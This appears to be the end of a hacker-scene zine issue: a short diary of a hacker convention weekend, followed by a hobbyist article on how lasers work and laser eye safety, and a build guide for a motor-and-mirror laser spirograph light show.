Saturday. more blurriness. I hung out with some kid by 'kp2' carrying around his sparc & etc. bought more shirts.
I also really wanted to go with pinguino and gang to the star trek experience, but my feet really hurt by that time.. so I hung around someplace. Probably with the tananda 804 girl that I met the first day (which was a surprise), and painting her nails. I also recall talking to psykocat & various people back at the room, which was a total blast. logic, signine, prophet, barkode, & I slept back at the room. I think...

Sunday. more blur. I recall hanging with penguin palace some more. getting a tori-do CD from ping, sitting at the table with pesto offering to sell various things for three dollars. I wandered around, hung out with skully, sloth, asphyxia, and some others in their room, resisted peer pressure.. ended up following tananda for most of the night, we joined some hack Canada people at the AmeriSuites hotel.. before going back to the pool party at the Alexis park.. I left and went back to tanda's room, and got some sleep before we had to leave around six in the morning.. we took a taxi to the airport and had to run to catch our flight..

The details of Saturday and Sunday are somewhat blurry, mostly cause I can't remember the details or when what happened.. I didn't even get drunk either. heh. I do remember sitting up front and center when Carolyn Meinel & Some other guy got into an argument over capture the flag, and both ended up getting kicked out. Most awesome.

───────────────────────────────────────────────────────────────────────────
───────────────────────────────────────────────────────────────────────────

LASERs - Theory and Safety
Secret Squirrel [ssq@penguinpalace.com]

-=[ INTRODUCTION ]=-

This document wasn't written to provide every bit of knowledge that exists on LASERs, but rather to give a general overview of how they work, and some safety issues that you should be aware of when working with LASERs.
There is a more complete (but not totally complete :) document that I wrote which appears in System Failure Issue #9, which is archived at http://www.penguinpalace.com/

A LASER is a light beam. This beam has 2 properties that other light sources don't have. LASER beams are both monochromatic (a single color) and coherent (all the light waves are the same, going the same direction, and the same phase). The difference between LASER light and a regular light bulb is like the difference between a single tone and static on your TV.

Here is a short list of some of the larger moments in LASER history:

1917  Einstein first comes up with the theory of a LASER
1954  The first Microwave LASER (termed MASER)
1960  First optical LASER
1966  First gas dynamic LASER
1984  First X-RAY LASER
1993  Gas contact plasma LASER

As you can see, the idea of a LASER has been around for nearly 100 years. Now, to a large degree we are very dependent on the LASER. From CD players, to Fiber Optic communications (both voice and data), to LASER light shows, to industrial cutting and welding, to medical and surgical procedures, the list goes on. The unique characteristics of LASER light - monochromaticity (the light is all the same color or wavelength), coherence (all the waves are in the same phase), and directionality (the beam is either well collimated at the beginning or can be easily collimated) - make this all possible.

But what is a LASER really? Well, the word LASER is an acronym for Light Amplification by Stimulated Emission of Radiation. What Light Amplification means is pretty easy to figure out: to take a light source and make it stronger. Stimulated Emission of Radiation is a little trickier. This is what Einstein first came up with back in 1917. He theorized (and it was later proven) that if you take a molecule and stimulate it to an excited state and then hit it with a photon, it would release a photon of the same wavelength, phase and direction.
When this photon is released the molecule will return to its unexcited state. As more and more molecules release photons, more and more photons get released as they bounce around in the lasing medium, and finally they come out and the LASER beam is there.

The output of a LASER can be pulsed or a continuous beam. It can be visible, Infrared, or Ultraviolet. Its power can be less than 1 milliwatt, or millions of watts. With all these differences, there are a few things that all LASERs have in common:

1. A lasing medium. This can be a solid, liquid, gas or semiconductor which can be pumped into a higher state. It must be possible to boost the majority of the lasing medium to an upper energy state called a population inversion. There must be a downward transition triggerable by stimulated emission.

2. A means of pumping energy into the lasing medium. A flash on a ruby rod, for instance, or an AC or DC charge on a gas LASER.

3. A resonator. In most cases this is a pair of mirrors, one at each end of the LASER, which allows stimulated light to bounce back and forth through the lasing medium. This is called a Fabry-Perot cavity. Nitrogen LASERs have a mirror only at one end.

-=[ SAFETY ]=-

I am sure that most of you have heard that you shouldn't shine a LASER into your eye (or anyone else's for that matter), and some of you have probably tried to see if you can. While you may have noticed that there is a momentary blindness created when you do that, the risk of more permanent damage is high. A collimated beam represents the rays from an object at infinity. If your eye is focused for distance and you shine it in your eye, your eye will focus it onto a very tiny spot on your retina, which can burn your retina, causing permanent damage.

The action of the focusing is much like taking a flashlight with an adjustable beam. If you spread it out you can see a lot of stuff, but none of it is very bright.
If you adjust the beam so that it falls onto a small spot (this works well with maglites) then that spot is bright, and you can see it more easily. Well, the output of the flashlight is the same; it's because it's all focused onto a small spot that it appears more powerful. So even a weak laser pointer can cause damage depending on your eye, and how it's focused.

Now, let's talk about power output. Most laser pens are under 5mW. That may seem like a small amount, especially since you have 100W light bulbs in your house. But what you may not be aware of is that 100W light bulb refers more to the current pull than the brightness of it. Only about 5-10W are output in the visible spectrum (most of the rest is given off in the IR portion of the spectrum). This light is spread out in all directions (remember the maglite above?) and the power density is very small. At 10cm from a 100W light bulb (assuming the visible portion is 6W) the power density would be about .05mW/sq. mm. At 1m (3.3 feet) it would be about .0005mW/sq mm. A 5mW LASER (like most pen LASERs are) would actually be brighter at 1m, and closer it may be more intense (because the beam will spread out in a cone, when you are closer the beam hits a smaller spot, and so it could be 10,000 times more intense if it's only 1mm in diameter). At mid-day the sun at the Earth's equator on a clear day has a power density of about 1mW/sq mm. Very low power LASERs can be as damaging to your eye as the sun can.

With that said, I would now like to point out some good practices when working with LASERs.

Always wear goggles. There are certain types that work better for certain LASER power outputs as well as the color of the beam. You want to prevent the beam from hitting your eye, although preventing other stuff from hitting your eyes when you are making a LASER (or other project) is also a good idea.

Never point a LASER at anyone. This is actually a law in many states now.
It is considered assault if you shine a LASER onto someone, and a lot of police officers really do not like it because it looks like a LASER sight that may be on a gun.

If you have a LASER show, keep the LASER above everyone else. It is a law (at least in most US states) that if you do a LASER light show, you must have the LASER itself at least 15' above the ground, and must shine it onto a target at least 15' above the crowd. This is to prevent accidental exposure to the beam. This is also a good idea since you never know where the beam is going next (when you are watching the show :) and you never know when the person next to you is going to bump into you, pushing you in front of the beam.

Accidents happen when you aren't watching for them. If you knew when an accident was going to happen, you would be able to prevent it. By their nature you don't know when they are going to happen, and as such cannot prevent them from happening (all the time). Because of this, if you are going to make a quick change to something, follow common sense. If you are working on a LASER, unplug it. It may be that you spill your soda onto the power switch, which causes the LASER to fire, and it hits a mirror and ... Or any number of other things.

───────────────────────────────────────────────────────────────────────────
───────────────────────────────────────────────────────────────────────────

LASER Spirograph
Secret Squirrel [ssq@penguinpalace.com]

You should have some familiarity with a LASER by this point, so I won't explain basic safety here, or much about how a LASER works (and for the most part that is irrelevant to this article). All that you need to know is that a LASER shoots a beam of light in 1 direction, and how to make it do that (by hooking it up to the correct power source). Because power supplies vary from LASER to LASER, I will not cover that here; that information should be included with your LASER, or should be available from the manufacturer of the LASER.
What I will cover is how to make a cheap LASER light show system. While this system won't draw text on a wall, it will create a neat pattern, which is somewhat configurable. This is a good first LASER project as well, because it's cheap, and easy to make.

First let's cover some basic facts. When you power up the LASER a beam goes in 1 direction. That beam doesn't bend, or curve under normal conditions. If a LASER beam hits a mirror, it will bounce off at the inverse of the angle of incidence. What this means is that if you hit a mirror at 45 degrees, it will bounce off at 45 degrees, but instead of coming straight back, it will continue on just bending slightly. See illustration below:

LASER origin   Reflected path
    \           /
     \         /
      \   Z   /
       \     /
      X \   / Y
 ------------------- mirror

Another way to prove this is that angle X + Y + Z == 180. This is even true if the beam is straight at the mirror, because X=90 Y=90 Z=0.

Armed with this knowledge, you can see how it's easy to draw a circle. Move the mirror so that the LASER is reflected onto a wall, and the spot where it hits is a circle. If you move the mirror fast enough, it will appear to be a solid line, and not a dot.

Now, one circle alone doesn't make a Spirograph. A Spirograph is really a small circle moving around in a large circle. So to do that we need to add another mirror. This mirror needs to get the reflected path from the first mirror. This will cause the Spirograph to appear on the wall. If you are playing with lasers and mirrors already, you may notice that it's easier to get the reflected beam into a smaller mirror if the mirrors are close together. Using this knowledge you can purchase smaller mirrors when you go to assemble the project.

Now, to make the mirrors move in a way favorable to cause the beam to go in a circle, you should epoxy them onto the shaft of the motor at a slight angle. Too much angle and they will make a really big circle, and you may have problems getting the beam to stay on the other mirror.
Too small of an angle and it won't make a large circle, and it won't be that impressive. I suggest between 2-5 degrees for most applications.

Supplies needed:

1 LASER (can be a LASER pen, much like Target sells for $5-$10)
2 Mirrors (front surface mirrors are best, but for this, it doesn't matter that much)
2 Motors (these must be variable speed motors - should work off 9v)
2 100k potentiometers
1 9v Battery connector
1 Case (optional, and you may want to get this after you assemble everything so you know exactly what size to get for your final project)
Some epoxy
Some wire to connect the battery, motors and potentiometers

Because it would be very difficult to express this in an ASCII drawing I am not even going to try. Instead I have included a .GIF image of the schematics.

This is a really simple project, and shouldn't take that long to build. For the mirrors you can try a local art & craft store, or get good ones for LASER projects (and some other goodies) at places like http://www.mi-lasers.com/ They typically have mirrors, scanners, etc. to make some neat effects if you want to play a little. They also have fog-in-a-can, which makes the beam more visible. Radio Shack should have everything else that is needed for this project.

───────────────────────────────────────────────────────────────────────────
-EOF